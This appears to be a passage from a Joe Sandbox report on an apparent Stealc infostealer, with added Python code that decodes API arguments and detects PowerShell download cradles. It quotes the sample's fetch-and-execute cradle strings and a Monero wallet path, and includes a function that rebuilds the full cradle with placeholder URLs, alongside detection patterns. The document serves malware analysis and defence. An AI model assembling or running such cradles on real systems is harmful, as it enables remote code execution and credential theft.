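SHARE_MASKS = [(0x1, "FILE_SHARE_READ"), (0x2, "FILE_SHARE_WRITE"), (0x4, "FILE_SHARE_DELETE")]
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING", 4: "OPEN_ALWAYS",
               5: "TRUNCATE_EXISTING"}
LMEM_MASKS = [(0x42, "LHND"), (0x40, "LPTR"), (0x2, "LMEM_MOVEABLE")]  # LPTR = LMEM_FIXED|LMEM_ZEROINIT
CSIDL = {0x05: "CSIDL_PERSONAL", 0x10: "CSIDL_DESKTOPDIRECTORY", 0x1A: "CSIDL_APPDATA",
         0x1C: "CSIDL_LOCAL_APPDATA", 0x23: "CSIDL_COMMON_APPDATA", 0x26: "CSIDL_PROGRAM_FILES"}


def decode_flags(value: int, masks: List[Tuple[int, str]], zero: str = "0") -> str:
    """Name a bitmask from an ordered (mask, name) table; whatever is left over stays hex."""
    if value == 0:
        return zero
    names, rest = [], value
    for mask, name in masks:
        if (rest & mask) == mask:          # parenthesised: '==' binds tighter than '&' in Python
            names.append(name)
            rest &= ~mask
    if rest:
        names.append(f"0x{rest:X}")
    return "|".join(names)


def _enum(table: Dict[int, str]) -> Callable[[int], str]:
    return lambda v: table.get(v, f"0x{v:X}")   # unknown values (handles, stack noise) stay hex


def _flags(masks: List[Tuple[int, str]], zero: str = "0") -> Callable[[int], str]:
    return lambda v: decode_flags(v, masks, zero)


# argument index -> (parameter name, decoder), for the APIs that appear in the listing
API_ARGS: Dict[str, Dict[int, Tuple[str, Callable[[int], str]]]] = {
    "RegOpenKeyExA": {0: ("hKey", _enum(HKEY_ROOTS)), 3: ("samDesired", _flags(KEY_MASKS))},
    "CreateFileA": {1: ("dwDesiredAccess", _flags(GENERIC_MASKS)),
                    2: ("dwShareMode", _flags(SHARE_MASKS, "0 (exclusive)")),
                    4: ("dwCreationDisposition", _enum(DISPOSITION))},
    "LocalAlloc": {0: ("uFlags", _flags(LMEM_MASKS, "LMEM_FIXED"))},
    "SHGetFolderPathA": {1: ("csidl", _enum(CSIDL))},
}
API_ARGS["RegOpenKeyExW"] = API_ARGS["RegOpenKeyExA"]
API_ARGS["CreateFileW"] = API_ARGS["CreateFileA"]


def _arg(token: str):
    if token == "?":
        return None                       # stack slot the sandbox could not recover
    try:
        return int(token, 16)
    except ValueError:
        return token                      # string argument resolved in place, e.g. \Monero\wallet.keys


def parse_call(line: str) -> Optional[Dict]:
    """Split one trace line into api/module/ref/args; None for lines that are not calls."""
    m = LINE_RE.search(line)
    if not m:
        return None
    raw = m.group("args")
    args = [_arg(t.strip()) for t in raw.split(",")] if raw else []
    return {"api": m.group("api"), "module": m.group("mod"), "ref": m.group("ref"),
            "subcall": m.group("sub"), "args": args}


def decode_call(call: Dict) -> Dict[str, str]:
    """Map the decodable arguments of a parsed call to their symbolic names."""
    out = {}
    for idx, (name, fn) in API_ARGS.get(call["api"], {}).items():
        if idx < len(call["args"]) and isinstance(call["args"][idx], int):
            out[name] = fn(call["args"][idx])
    return out


def annotate(line: str) -> str:
    call = parse_call(line)
    if call is None:
        return line
    decoded = ", ".join(f"{k}={v}" for k, v in decode_call(call).items())
    return f"{call['ref']}  {call['api']}.{call['module']}  {decoded}".rstrip()


SAMPLE = [  # lines copied from the listing above
    "• memset.MSVCRT ref: 00984325",
    "• RegOpenKeyExA.ADVAPI32(80000001,0181E0C8,00000000,00020119,?), ref: 00984344",
    "• CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0097A13C",
    "• LocalAlloc.KERNEL32(00000040,?), ref: 0097A181",
    "• Part of subcall function 00988F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00988F9B",
]

if __name__ == "__main__":
    for line in SAMPLE:
        print(annotate(line))
```

Feeding the whole "APIs" section of the report through `annotate` gives one line per call with the root key, access mask, disposition and CSIDL spelled out; anything the tables do not know stays as hex, so a value that is really a handle or stack noise is never mislabelled.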
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: String___crt$Typememset
                                        • String ID:
                                        • API String ID: 3530896902-3916222277
                                        • Opcode ID: e77fc5ee84795935c6efd50e401a2245a763212c8f17c89663b4410fafca662e
                                        • Instruction ID: 99aa5c46c495c255d2d442c49cf268214951aaf0417ce631e7809fa8a785e6eb
                                        • Opcode Fuzzy Hash: e77fc5ee84795935c6efd50e401a2245a763212c8f17c89663b4410fafca662e
                                        • Instruction Fuzzy Hash: 2541E6F110479C5EDB31AB24CC85FFB7BEC9B45704F1448E8E9CA96282E2719A44DF60
                                        APIs
                                        • lstrcat.KERNEL32(?,0181F620), ref: 00984A2B
                                          • Part of subcall function 00988F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00988F9B
                                        • lstrcat.KERNEL32(?,00000000), ref: 00984A51
                                        • lstrcat.KERNEL32(?,?), ref: 00984A70
                                        • lstrcat.KERNEL32(?,?), ref: 00984A84
                                        • lstrcat.KERNEL32(?,0180A798), ref: 00984A97
                                        • lstrcat.KERNEL32(?,?), ref: 00984AAB
                                        • lstrcat.KERNEL32(?,0181E2A8), ref: 00984ABF
                                          • Part of subcall function 0098AA50: lstrcpy.KERNEL32(00990E1A,00000000), ref: 0098AA98
                                          • Part of subcall function 00988F20: GetFileAttributesA.KERNEL32(00000000,?,00971B94,?,?,0099577C,?,?,00990E22), ref: 00988F2F
                                          • Part of subcall function 009847C0: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 009847D0
                                          • Part of subcall function 009847C0: RtlAllocateHeap.NTDLL(00000000), ref: 009847D7
                                          • Part of subcall function 009847C0: wsprintfA.USER32 ref: 009847F6
                                          • Part of subcall function 009847C0: FindFirstFileA.KERNEL32(?,?), ref: 0098480D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                        • String ID:
                                        • API String ID: 2540262943-0
                                        • Opcode ID: 0354c574923731cc7109cce25586acd0a198527600a17abc46c986fb792aaa3f
                                        • Instruction ID: 9d456b2a8091438133543852fc52800a7779a664c4d5f90c89ce47a8c61ade90
                                        • Opcode Fuzzy Hash: 0354c574923731cc7109cce25586acd0a198527600a17abc46c986fb792aaa3f
                                        • Instruction Fuzzy Hash: FB3142B6900218A7DB24FBB0DC95FDE733CBB98700F404689B24596151EFB4A7C8CBA5
                                        APIs
                                          • Part of subcall function 0098AA50: lstrcpy.KERNEL32(00990E1A,00000000), ref: 0098AA98
                                          • Part of subcall function 0098ACC0: lstrlen.KERNEL32(?,01818C08,?,\Monero\wallet.keys,00990E1A), ref: 0098ACD5
                                          • Part of subcall function 0098ACC0: lstrcpy.KERNEL32(00000000), ref: 0098AD14
                                          • Part of subcall function 0098ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0098AD22
                                          • Part of subcall function 0098AC30: lstrcpy.KERNEL32(00000000,?), ref: 0098AC82
                                          • Part of subcall function 0098AC30: lstrcat.KERNEL32(00000000), ref: 0098AC92
                                          • Part of subcall function 0098ABB0: lstrcpy.KERNEL32(?,00990E1A), ref: 0098AC15
                                        • ShellExecuteEx.SHELL32(0000003C), ref: 00982FD5
                                        Strings
                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00982F54
                                        • ')", xrefs: 00982F03
                                        • <, xrefs: 00982F89
                                        • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00982F14
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                        • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        • API String ID: 3031569214-898575020
                                        • Opcode ID: 14aaea04fc4c81cabbe9713ddfba0c2a020482e896f1778d8f4a01d4fc3f78ea
                                        • Instruction ID: 9918a0f71e3f4657d212ae1197a427f27ecb425458cf7dd3960677de2c998933
                                        • Opcode Fuzzy Hash: 14aaea04fc4c81cabbe9713ddfba0c2a020482e896f1778d8f4a01d4fc3f78ea
                                        • Instruction Fuzzy Hash: 2E41DE719102089AEB14FFE0CCA2BEDB779BF94300F40455AE015B7292EF786A49CF51
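The strings cross-referenced in this function are the pieces of a PowerShell download cradle: the sample concatenates `-nop -c "iex(New-Object Net.WebClient).DownloadString('`, a URL and `')"`, and hands the result together with the hard-coded SysWOW64 powershell.exe path (the 32-bit interpreter, consistent with a 32-bit parent) to ShellExecuteEx. The URL itself does not appear in the listing; it is supplied at runtime. The code below is an added example for this page, not Joe Sandbox or Stealc code. It rebuilds the (lpFile, lpParameters) pair from the literals shown, taking the URL as a parameter, and then scores process-creation records for the same cradle. Assumptions: the URL sits between the two fragments (that is what the cradle syntax requires); the Sysmon-style records, the parent path for file.exe and the example.invalid URLs are constructed; and the detector generalises slightly beyond the page by matching case- and whitespace-insensitively and by covering DownloadFile and DownloadData alongside DownloadString.

```python
"""Reconstruct the PowerShell download cradle assembled above and flag it in process telemetry.

Added example for this page (not Joe Sandbox or Stealc code). The three literals are the ones
cross-referenced in the listing; the URL is supplied by the sample at runtime and is not in the
report, so it is a parameter here.
"""
import re
from typing import Dict, List, Optional, Tuple

# Literals from the listing (xrefs 00982F54, 00982F14, 00982F03).
PS_EXE = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
CRADLE_PREFIX = "-nop -c \"iex(New-Object Net.WebClient).DownloadString('"
CRADLE_SUFFIX = "')\""


def build_cradle(url: str) -> Tuple[str, str]:
    """Return (lpFile, lpParameters) as the sample passes them to ShellExecuteEx.
    ASSUMPTION: the runtime URL goes between the two fragments, as the cradle syntax requires."""
    return PS_EXE, f"{CRADLE_PREFIX}{url}{CRADLE_SUFFIX}"


# (name, pattern, weight). Case-insensitive and spacing-tolerant so trivial rewrites still hit.
INDICATORS = [
    ("invoke_expression", re.compile(r"\b(?:iex|invoke-expression)\b", re.I), 2),
    ("webclient_download",
     re.compile(r"net\.webclient\s*\)?\s*\.\s*download(?:string|file|data)\s*\(", re.I), 3),
    ("no_profile", re.compile(r"(?:^|\s)-nop\w*", re.I), 1),
    ("inline_command", re.compile(r"(?:^|\s)-c(?:ommand)?\b", re.I), 1),
    # the sample hard-codes the WOW64 interpreter, i.e. a 32-bit parent launched PowerShell
    ("wow64_powershell", re.compile(r"\\syswow64\\windowspowershell\\", re.I), 1),
]
ALERT_THRESHOLD = 5  # a download call plus iex, or a download call plus both switches


def score_command_line(cmd: str) -> Dict:
    hits = [(name, weight) for name, rx, weight in INDICATORS if rx.search(cmd)]
    score = sum(w for _, w in hits)
    return {"score": score, "hits": [n for n, _ in hits],
            "verdict": "download-cradle" if score >= ALERT_THRESHOLD else "benign"}


URL_RE = re.compile(r"download(?:string|file|data)\s*\(\s*['\"]\s*([^'\"]+?)\s*['\"]", re.I)


def extract_cradle_url(cmd: str) -> Optional[str]:
    """Pull the stage URL out of the cradle for blocking and pivoting; None when there is none."""
    m = URL_RE.search(cmd)
    return m.group(1) if m else None


def analyze_events(events: List[Dict]) -> List[Dict]:
    """Score every powershell.exe launch in Sysmon-Event-ID-1-shaped records; return the alerts."""
    alerts = []
    for ev in events:
        if not ev["Image"].lower().endswith("\\powershell.exe"):
            continue
        result = score_command_line(ev["CommandLine"])
        if result["verdict"] == "benign":
            continue
        alerts.append({"ProcessId": ev["ProcessId"], "ParentImage": ev["ParentImage"],
                       "url": extract_cradle_url(ev["CommandLine"]), **result})
    return alerts


# Constructed records (not from the report): one launch shaped exactly like the sample's, one
# routine admin script, one cradle with different casing/spacing, one non-PowerShell process.
SYS32_PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"ProcessId": 4120, "Image": PS_EXE, "ParentImage": r"C:\Users\user\Desktop\file.exe",
     "CommandLine": " ".join(build_cradle("http://example.invalid/stage2.ps1"))},
    {"ProcessId": 4188, "Image": SYS32_PS, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1"},
    {"ProcessId": 4201, "Image": SYS32_PS, "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": "powershell.exe -NoP -W Hidden -C \"IEX (New-Object Net.WebClient)"
                    ".DownloadString( 'https://example.invalid/a' )\""},
    {"ProcessId": 4300, "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "notepad.exe"},
]

if __name__ == "__main__":
    for alert in analyze_events(SAMPLE_EVENTS):
        print(alert)
```

The threshold is set so that a WebClient download call combined with either `iex` or both of the `-nop`/`-c` switches alerts, while `-File` runs of an existing script do not; the SysWOW64 path is scored separately because it is the one indicator specific to this sample rather than to download cradles in general, and the extracted URL is what goes to the proxy blocklist and the C2 pivot.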
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: dllmain_raw$dllmain_crt_dispatch
                                        • String ID:
                                        • API String ID: 3136044242-0
                                        • Opcode ID: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                                        • Instruction ID: d2b550518adc6c62ebfbe3efe69004f29178dcd75341472c4e6b867ecb625b01
                                        • Opcode Fuzzy Hash: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                                        • Instruction Fuzzy Hash: 92217FB2D00698AFDB239E56CC41BBF3B79EB81794B254919FCD967211C3344D438BA0
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00987FC7
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00987FCE
                                        • RegOpenKeyExA.ADVAPI32(80000002,0180B8E8,00000000,00020119,?), ref: 00987FEE
                                        • RegQueryValueExA.ADVAPI32(?,0181DFE8,00000000,00000000,000000FF,000000FF), ref: 0098800F
                                        • RegCloseKey.ADVAPI32(?), ref: 00988022
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                        • String ID:
                                        • API String ID: 3225020163-0
                                        • Opcode ID: e60f7bfc1acbb52d2ba846f8495ac6ce28859956fac29e9a02baa5203aa911d7
                                        • Instruction ID: 3f1bb4c7ae1096f7efcadb0c2d297a47c4b78dd8e85fbbc0e32704a912f9e3a1
                                        • Opcode Fuzzy Hash: e60f7bfc1acbb52d2ba846f8495ac6ce28859956fac29e9a02baa5203aa911d7
                                        • Instruction Fuzzy Hash: C5118CB6A44205EFDB10DF94DD49FBFBBB8FB45B10F104219F615A7280D7B959008BA1
                                        APIs
                                        • StrStrA.SHLWAPI(0181F770,00000000,00000000,?,00979F71,00000000,0181F770,00000000), ref: 009893FC
                                        • lstrcpyn.KERNEL32(00C47580,0181F770,0181F770,?,00979F71,00000000,0181F770), ref: 00989420
                                        • lstrlen.KERNEL32(00000000,?,00979F71,00000000,0181F770), ref: 00989437
                                        • wsprintfA.USER32 ref: 00989457
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpynlstrlenwsprintf
                                        • String ID: %s%s
                                        • API String ID: 1206339513-3252725368
                                        • Opcode ID: 92ff0a04cf14f29ca7e7f156d6cd1c28cbf946ef4f1802e4022aaaedce0a326d
                                        • Instruction ID: 31b12b09eb18e4cfd04f130837d96e40f3e23343c34b344c69441092782fdc76
                                        • Opcode Fuzzy Hash: 92ff0a04cf14f29ca7e7f156d6cd1c28cbf946ef4f1802e4022aaaedce0a326d
                                        • Instruction Fuzzy Hash: C001C875608108FFCB04DFA8C948AAE7B78FB49304F158648F9099B255D731AA54DBA0
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 009712B4
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 009712BB
                                        • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 009712D7
                                        • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 009712F5
                                        • RegCloseKey.ADVAPI32(?), ref: 009712FF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                        • String ID:
                                        • API String ID: 3225020163-0
                                        • Opcode ID: 782f28a6f229c71c8a7ec9f1219b3bc0d623191acc55c48f1a9ea253b38bbcbf
                                        • Instruction ID: 68f7b4e40144702a266e4583cbafc60a3ce714adc1ae5d75f36dbaf39862de22
                                        • Opcode Fuzzy Hash: 782f28a6f229c71c8a7ec9f1219b3bc0d623191acc55c48f1a9ea253b38bbcbf
                                        • Instruction Fuzzy Hash: 5001CD79A44209FFDB14DFE4DC49FAE777CBB49701F108295FA1997290D7709A008B90
                                        APIs
                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00986903
                                          • Part of subcall function 0098AA50: lstrcpy.KERNEL32(00990E1A,00000000), ref: 0098AA98
                                          • Part of subcall function 0098ACC0: lstrlen.KERNEL32(?,01818C08,?,\Monero\wallet.keys,00990E1A), ref: 0098ACD5
                                          • Part of subcall function 0098ACC0: lstrcpy.KERNEL32(00000000), ref: 0098AD14
                                          • Part of subcall function 0098ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0098AD22
                                          • Part of subcall function 0098ABB0: lstrcpy.KERNEL32(?,00990E1A), ref: 0098AC15
                                        • ShellExecuteEx.SHELL32(0000003C), ref: 009869C6
                                        • ExitProcess.KERNEL32 ref: 009869F5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                        • String ID: <
                                        • API String ID: 1148417306-4251816714
                                        • Opcode ID: c8d49f2b91459bfdd5800833319edb8db0dd6fc42136e83cd969b6f1125b88af
                                        • Instruction ID: dcd2bab78f16facb93e9fc786c55d4d11dbf95579ce780c7f90144f63b0eca4e
                                        • Opcode Fuzzy Hash: c8d49f2b91459bfdd5800833319edb8db0dd6fc42136e83cd969b6f1125b88af
                                        • Instruction Fuzzy Hash: 0E31DDB1901218ABEB14FB90DD95FDEB778AF94300F404199F20567291DF746B48CF65
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00990E10,00000000,?), ref: 009889BF
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 009889C6
                                        • wsprintfA.USER32 ref: 009889E0
                                          • Part of subcall function 0098AA50: lstrcpy.KERNEL32(00990E1A,00000000), ref: 0098AA98
                                        Strings
                                        Memory Dump Source
